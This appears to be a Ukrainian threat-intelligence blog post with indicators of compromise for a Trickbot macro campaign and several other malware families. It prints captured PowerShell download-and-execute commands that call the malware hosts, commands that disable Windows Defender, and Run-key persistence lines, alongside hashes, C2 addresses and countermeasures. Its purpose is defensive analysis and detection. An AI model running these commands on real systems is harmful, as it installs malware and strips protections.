Archive | 05/07/2018

IOC_Trickbot_040718

Доброго ранку, панове.

 

Вчора отримали на аналіз зразок документу з макросом, активація якого призводить до інфікування #Trickbot.

Обидва джерела досі активні, а основне тіло активно передає інформацію з інфікованих систем.

Є відмінності в способі доставки порівняно із зразком який ми розглядали 11/06.

Рівень загрози, для організацій котрі не блокують макроси, не контролюють PowerShell – високий.

А для тих, хто уважно читає наші поради – низький.

Нагадую, що #Trickbot є модульним ШПЗ, яке використовується для збору даних та стеження.

Може довантажувати різні модулі для шифрування або віддаленого керування.

На що треба звернути увагу:

  • Обидва сервери, що розповсюджують частини malware досі активні
  • Сервер контролю той же самий що і 11/06
  • Передача зібраних даних із User Agent ‘Test’
  • Завантаження payload силами powershell через його виклик з cmd
  • Шлях та ім’я з яким записується і запускається payload рандомні
  • Payload не кодований (!This program cannot be run in DOS mode.)
  • Payload завантажуєтеся по захищеному протоколу (Cloudflare)
  • Виконання проходить із затримкою ~2-3 хв
  • Зразок не зачищає за собою файли у %tmp% після міграції в %apdata%
  • Спроб закріплення не проводив
  • Натомість намагається відключити Windows Defender
  • Перевірку IP та звернення до Windows Update здійснює основне тіло
  • Зразок також довантажує з windowsupdate.com кореневі сертифікати
  • А от передача зібраних даних уже через інжектований svchost
  • Прав Адміністратора не потребує

І так, проблеми будуть у тих, хто:

  • Не блокують макроси (90% державних установ)
  • Не заборонили завантаження через powershell (більше 50% організацій)
  • На блокують несанкціоноване завантаження додатків з робочих систем (50% організацій)
  • Не блокують створення та запуск нових .exe з каталогів C:\Users\**\*.exe (70% установ)

Схема атаки:

Email attach (.doc) > vba macro > cmd > powershell > 2 URL > GET bri.ri > %tmp%\%random%.exe

Маркери IOC:

документ

SHA-256    fe0f98f1f0f64564150aa919ed1eed350ec6bec96eba7e08a605124afa6fe6aa
File name   in.doc
File size      80.5 KB

 

Макрос містить 2 URL:

h11p:\meanmuscles{.} com/bri.ri  + active
h11p:\icoindna{.} io/bri.ri      + active

 

основна частина

SHA-256        481fda910780812056f5dbe6a5f534ad114b527f0386933febca56b738300b54
File name   bri.ri  >> %tmp%\%random%.exe !This program cannot be run in DOS mode.
File size      316 KB

 

Відкриває з’єднання із С2

h11p\188.124.167.132:8082 POST /ser0704/hostname.UID     HTTP/1.1    test (UA)

минулого разу:
h11p\188.124.167.132:8082 POST /ser0611/hostname.UID     HTTP/1.1    test (UA)

 

Активність по процесам:

“C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE” /n /dde

C:\Windows\SysWOW64\cmd.exe /c powershell “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”%tmp%\uauuind.exe”);start-process ”%tmp%\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri’‘)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wswjdpihx.bat; start-process ‘%tmp%\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “‘powershell “”function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,”C:\tmp\uauuind.exe”);start-process ”C:\tmp\uauuind.exe”;}try{dodjq(”h11p:\icoindna {.}io/bri.ri”)}catch{dodjq(”h11p:\meanmuscles {.}com/bri.ri”)}'”” | out-file -encoding ascii -filepath C:\tmp\wswjdpihx.bat; start-process ‘C:\tmp\wswjdpihx.bat’ -windowstyle hidden”

C:\Windows\SysWOW64\cmd.exe  /c “”C:\tmp\wswjdpihx.bat” “

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell  “function dodjq([string] $aoumq){(new-object system.net.webclient).downloadfile($aoumq,’C:\tmp\uauuind.exe’);start-process ‘C:\tmp\uauuind.exe’;}try{dodjq(‘h11p:\icoindna {.}io/bri.ri’)}catch{dodjq(‘h11p:\meanmuscles {.}com/bri.ri’)}

“C:\tmp\uauuind.exe”

C:\Windows\SysWOW64\cmd.exe /c sc stop WinDefend

C:\Windows\SysWOW64\cmd.exe /c sc delete WinDefend

C:\Windows\SysWOW64\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true

C:\Users\operator\AppData\Roaming\msscsc\uauuind.exe

C:\Windows\system32\svchost.exe

 

Зверніть увагу на рандом макросу:

1st run

——-

cmd /c powershell “‘powershell “”function ysga([string] $bmecmdmov){(new-object system.net.webclient).downloadfile($bmecmdmov,”%tmp%\xpvsvgw.exe”);start-process ”%tmp%\xpvsvgw.exe”;}try{ysga(”h11p:\icoindna{.} io/bri.ri”)}catch{ysga(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\dduuyd.bat; start-process ‘%tmp%\dduuyd.bat’ -windowstyle hidden”

 

2nd run

——-

cmd /c powershell “‘powershell “”function bxode([string] $wxhfe){(new-object system.net.webclient).downloadfile($wxhfe,”%tmp%\nsxr.exe”);start-process ”%tmp%\nsxr.exe”;}try{bxode(”h11p:\icoindna{.} io/bri.ri”)}catch{bxode(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\ktph.bat; start-process ‘%tmp%\ktph.bat’ -windowstyle hidden”

 

3rd run

——-

cmd /c powershell “‘powershell “”function nnpsd([string] $knhvd){(new-object system.net.webclient).downloadfile($knhvd,”%tmp%\bixi.exe”);start-process ”%tmp%\bixi.exe”;}try{nnpsd(”h11p:\icoindna{.} io/bri.ri”)}catch{nnpsd(”h11p:\meanmuscles{.} com/bri.ri”)}'”” | out-file -encoding ascii -filepath %tmp%\wjqw.bat; start-process ‘%tmp%\wjqw.bat’ -windowstyle hidden”

 

Збір інформації вбудованими засобами ОС:

C:\Windows\system32\cmd.exe /c ipconfig /all

C:\Windows\system32\cmd.exe /c net config workstation

C:\Windows\system32\cmd.exe /c net view /all

C:\Windows\system32\cmd.exe /c net view /all /domain

C:\Windows\system32\cmd.exe /c nltest /domain_trusts

C:\Windows\system32\cmd.exe /c nltest /domain_trusts /all_trusts

 

Мережеві IOC:

Завантаження основного тіла:

104.27.25.56      icoindna {.}io               GET /bri.ri HTTP/1.1     noUA
68.65.120.85      meanmuscles{.} c0m           GET /bri.ri HTTP/1.1     noUA

Минулого разу:
68.65.120.85      onetimewonders{.} c0m       GET /no.bin HTTP/1.1   noUA

 

Перевірка Public IP:

34.224.244.1      checkip.amazonaws {.}com  GET / HTTP/1.1   Mozilla/5.0

 

Передача інформації про інфіковану систему:

188.124.167.132:8082         POST /ser0704/hostname_UID HTTP/1.1 test

 

Трафік інфікованої системи:

[System Process] 49167        83.220.168.209   447   TIME_WAIT                                                                       
svchost.exe        49165        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49170        188.124.167.132 8082 CLOSE_WAIT                                                                             
svchost.exe        49171        109.234.34.106   443   ESTABLISHED                                                                            
svchost.exe        49172        62.140.236.163   80     ESTABLISHED

 

Яку інформацію отримують нападники:

 

POST /ser0704/hostname_UID HTTP/1.1
Content-Type: multipart/form-data; boundary=Arasfjasu7
User-Agent: test
Host: 188.124.167.132:8082
Content-Length: 5007
Cache-Control: no-cache

--Arasfjasu7

Content-Disposition: form-data; name="proclist"

                ***PROCESS LIST***

[System Process]
System
smss.exe
csrss.exe
wininit.exe
csrss.exe
winlogon.exe
services.exe
lsass.exe
lsm.exe
svchost.exe
...

--Arasfjasu7
Content-Disposition: form-data; name="sysinfo"

                ***SYSTEMINFO***

Host Name - APM11
OS Name - Microsoft Windows 7 ..........................
OS Version - Service Pack 1
OS Architecture - 64-bit
Product Type - Workstation
Build Type - Multiprocessor Free
Registered Owner - operator
Total Physical Memory - 2371 Mb
Available Physical Memory - 2371 Mb

                /c ipconfig /all

                /c net view /all

                /c net view /all /domain

                /c nltest /domain_trusts

                /c nltest /domain_trusts /all_trusts

--Arasfjasu7--
HTTP/1.1 200 OK
server: Cowboy
date: Wed, 04 Jul 2018 18:34:28 GMT
content-length: 3
Content-Type: text/plain
- - - - - - - - - - - - - - - - - - - 

Контрзаходи:

  • Перевірка журналів мережевого обладнання на наявність з’єднань із С2
  • Блокування на Proxy вихідних з’єднань без User Agent та з UA ‘test’
  • Блокування несанкціонованої доставки запускних на рівні Web та Email шлюзів
  • По можливості – відмова від макросів
  • Заборона запуску дочірніх процесів для додатків MS Office, mshta.exe, powershell та cmd – користувацьке правило Access Protection (McAfee ENS)
  • Заборона специфічного виклику PowerShell – нагадую про вбудовані можливості McAfee ENS – правила Access Protection
  • Заборона мережевої активності для PowerShell – правило вбудованого брандмауеру (по аналогії з варіант1)
  • Моніторинг (хоча б) та\або блокування створення (або хоча би запуску) нових *.EXE файлів у каталогах C:\Users\**\
  • Розгортання механізмів т.з. “білих списків” для захисту від виконання несанкціонованого коду (на серверах/критичних системах)
  • Розгортання комплексу захисту McAfee ATD + ENS ATP + MAR для перевірки та блокування файлів із невідомою репутацією
  • Співбесіди з персоналом на тему сучасних цільових/масових атак із застосуванням фішингу та соц. інженерії

Будьте уважні та обережні!

VR

IOC_digest_0618

Усім привіт.

Через брак часу та велику кількість зразків надсилаю стислий дайджест того, що присилали наприкінці червня:

 

140618 

#LokiBot #lokibot

SHA-256               7df5d234ba9b5de40e8dae695471f2a0362de10177e3518eb7f9e8c172b47643
File name            PAYMENT SWIFT PDF.iso
File size 696 KB


SHA-256               1800b88ea906961b4ecfd374756cb2c7f0273c6048c04497e315224484cf659e
File name            PAYMENT SWIFT PDF.exe
File size 636 KB

 

h11p://ponsse{.} site/nzube/fre.php

104.28.26.87       ponsse{.} site     POST /nzube/fre.php HTTP/1.0 Mozilla/4.08 (Charon; Inferno)  

 

– – – – – – – – – – –

150618

#js #grandcrab

SHA-256               85838b0cbd2beac5e91b24afbf7a36156b2270bc0c874b6377541740b74a9851
File name            20188946_894679.jpg.zip
File size 21.92 KB

SHA-256               1f26017ef432aee644400e4854e54ff330c797ea8eb79190368fed9cf630377b
File name            e233d4ac26fee5ff56a6536d0db7373217b4c4a7
File size 21.78 KB

SHA-256               eb371764b422e9384e3fb8cbb12112e64666c362758c62bcabbd9f17c7d94341
File name            crabin.exe
File size 207.51 KB

 

h11p://92.63.197{.} 60/crabin.exe?agQefX

92.63.197.60       92.63.197.60       GET /crabin.exe?agQefX HTTP/1.1                            80           HTTP      133

66.171.248.178  carder{.} bit        GET / HTTP/1.1 Mozilla/5.0

217.156.87.2       carder{.} bit        POST /eeb?eyge=ies HTTP/1.1  (application/x-www-form-urlencoded)    Mozilla/5.0

 

#Trickbot

SHA-256               5e7a1ed5f9a1fbc9d7148fbc28a379dc0067508844b6d342084d26b75c995d4f
File name            75812277127A00113A.doc
File size 69 KB

 

macro > cmd > powershell > GET

 

h11p://onetimewonders{.} com/no.bin (!)

h11p://nepalhiking{.} com/no.bin (404)

 

SHA-256               503c5c3cb68e1e057df4b99fe338d65d44d4c6e1f49396929d3fff66044505af
File name            no.bin   !This program cannot be run in DOS mode.
File size 338 KB

 

h11p\188.124.167.132:8082/ser0611/

 

– – – – – – – – – – –

190618

 

#adwind

SHA-256               2a6ea5647c951659854df5bc3437462294815da880872cc93e96fc01cccd85e4
File name            ORDER SAMPLE.jar
File size 479.42 KB

 

javaw.exe  197.211.59.160  pmanlog.ddns{.} net

 

proc

"C:\Program Files\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\operator\Desktop\adwind1906.jar"
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
"C:\Program Files\Java\jre1.8.0_171\bin\java.exe" -jar C:\tmp\_0.32649732458480233098419347231064428.class
cmd.exe /C cscript.exe C:\tmp\Retrive6508158100243133376.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive3329749612520250823.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
cmd.exe /C cscript.exe C:\tmp\Retrive6611168625816267695.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive35953365366553471.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v extjXQeGNff /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\RmAnqeogmJS\ZQaAquQZKoS.tUCacg\"" /f
attrib +h "C:\Users\operator\RmAnqeogmJS\*.*"
attrib +h "C:\Users\operator\RmAnqeogmJS"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\RmAnqeogmJS\ZQaAquQZKoS.tUCacg
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.64094332285124526171507674142480917.class
cmd.exe /C cscript.exe C:\tmp\Retrive4167831113503291950.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive4003874893192164925.vbs
taskkill /IM UserAccountControlSettings.exe /T /F
cmd.exe /c regedit.exe /s C:\tmp\UjxCMXPFhx4211656766753692948.reg
taskkill /IM Taskmgr.exe /T /F
WMIC /Node:localhost /Namespace:\\root\cimv2 Path Win32_PnpSignedDriver Get /Format:List
taskkill /IM PSUAMain.exe /T /F

 

comp

java.exe               1964       TCP        127.0.0.1              50131    127.0.0.1              7777       SYN_SENT

javaw.exe           2772       TCP        10.0.2.15              50102    185.208.211.142                3382       ESTABLISHED

 

#pony (fareit)

SHA-256               c0c4ad871ffe0231961fb2d77ee575c07e4ade470b0d6c84faa7f92ba511ee64
File name            decoded.gz
File size 188.51 KB



SHA-256               5dda41fb0abc6528d80995aedb47c0b59fc6467e7307bbdc75d097aef50fcd21
File name            deed.exe
File size 672 KB

 

185.6.242.251     hosedoin{.} ml   POST /fiv/roks/gate.php HTTP/1.0            Mozilla/4.0

 

– – – – – – – – – – –

200618

#adwind #jar

 

proc

—-

"C:\Program Files\Java\jre1.8.0_171\bin\javaw.exe" -jar "C:\Users\operator\Desktop\adwind20.jar"
C:\Windows\system32\icacls.exe C:\ProgramData\Oracle\Java\.oracle_jre_usage /grant "everyone":(OI)(CI)M
C:\Program Files\Java\jre1.8.0_171\bin\java.exe" -jar C:\tmp\_0.54780904655995994375189407378187035.class
cmd.exe /C cscript.exe C:\tmp\Retrive6543292869224297367.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive4922912961062946918.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
cmd.exe /C cscript.exe C:\tmp\Retrive2680843125772440624.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive8763095501247174336.vbs
xcopy "C:\Program Files\Java\jre1.8.0_171" "C:\Users\operator\AppData\Roaming\Oracle\" /e
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v ZllOQijdfpg /t REG_EXPAND_SZ /d "\"C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe\" -jar \"C:\Users\operator\VGyRmlBYozs\CFiYFpKudNh.vaZoLR\"" /f
attrib +h "C:\Users\operator\VGyRmlBYozs\*.*"
attrib +h "C:\Users\operator\VGyRmlBYozs"
C:\Users\operator\AppData\Roaming\Oracle\bin\javaw.exe -jar C:\Users\operator\VGyRmlBYozs\CFiYFpKudNh.vaZoLR
C:\Users\operator\AppData\Roaming\Oracle\bin\java.exe -jar C:\tmp\_0.7762377356869443373969133677298847.class
cmd.exe /C cscript.exe C:\tmp\Retrive5882107392697143603.vbs
cmd.exe /C cscript.exe C:\tmp\Retrive1289986287422620902.vbs
taskkill /IM UserAccountControlSettings.exe /T /F
cmd.exe /c regedit.exe /s C:\tmp\DpVePFPaGi2225327046919394054.reg
taskkill /IM Taskmgr.exe /T /F

 

comp

—-

java.exe               3740       TCP        127.0.0.1              50177    127.0.0.1              7777       SYN_SENT

javaw.exe           3136       TCP        10.0.2.15              50176    185.208.211.138                4573       SYN_SENT

 

#pony #fareit

SHA-256               b3468cc1949f8686bd2bc8bda351dc4b31a45f9fcf6c2ea27279421c4465c431
File name            HSBC COPY.docx - clean
File size 76.05 KB


SHA-256               64fd95c4c13fadee7b5fbbe946f0bd66cce07a5a6488c2bc95faefb0098aa97d
File name            PAYMENTCOPY_PDF.exe
File size 50.55 MB

 

h11p://cellimark{.} com/yangzhouming/coreserver/gate.php

h11p://cellimark{.} com/yangzhouming/coreserver/shit.exe  – 404

 

103.63.2.238       cellimark{.} com                POST /yangzhouming/coreserver/gate.php HTTP/1.0       Mozilla/4.0

103.63.2.238       cellimark{.} com                GET /yangzhouming/coreserver/shit.exe HTTP/1.0            Mozilla/4.0                 – 404

– – – – – – – – – – –

Контрзаходи незмінні.

Хто забув чи не знав – дивіться попередні звіти по цим сімействам:

 

#LokiBot              https://radetskiy.wordpress.com/?s=lokibot

#TrickBot             https://radetskiy.wordpress.com/?s=trickbot

#Adwind              https://radetskiy.wordpress.com/?s=adwind

#Pony                   https://radetskiy.wordpress.com/?s=pony

 

Вдалого дня.

Будьте уважні та обережні!

VR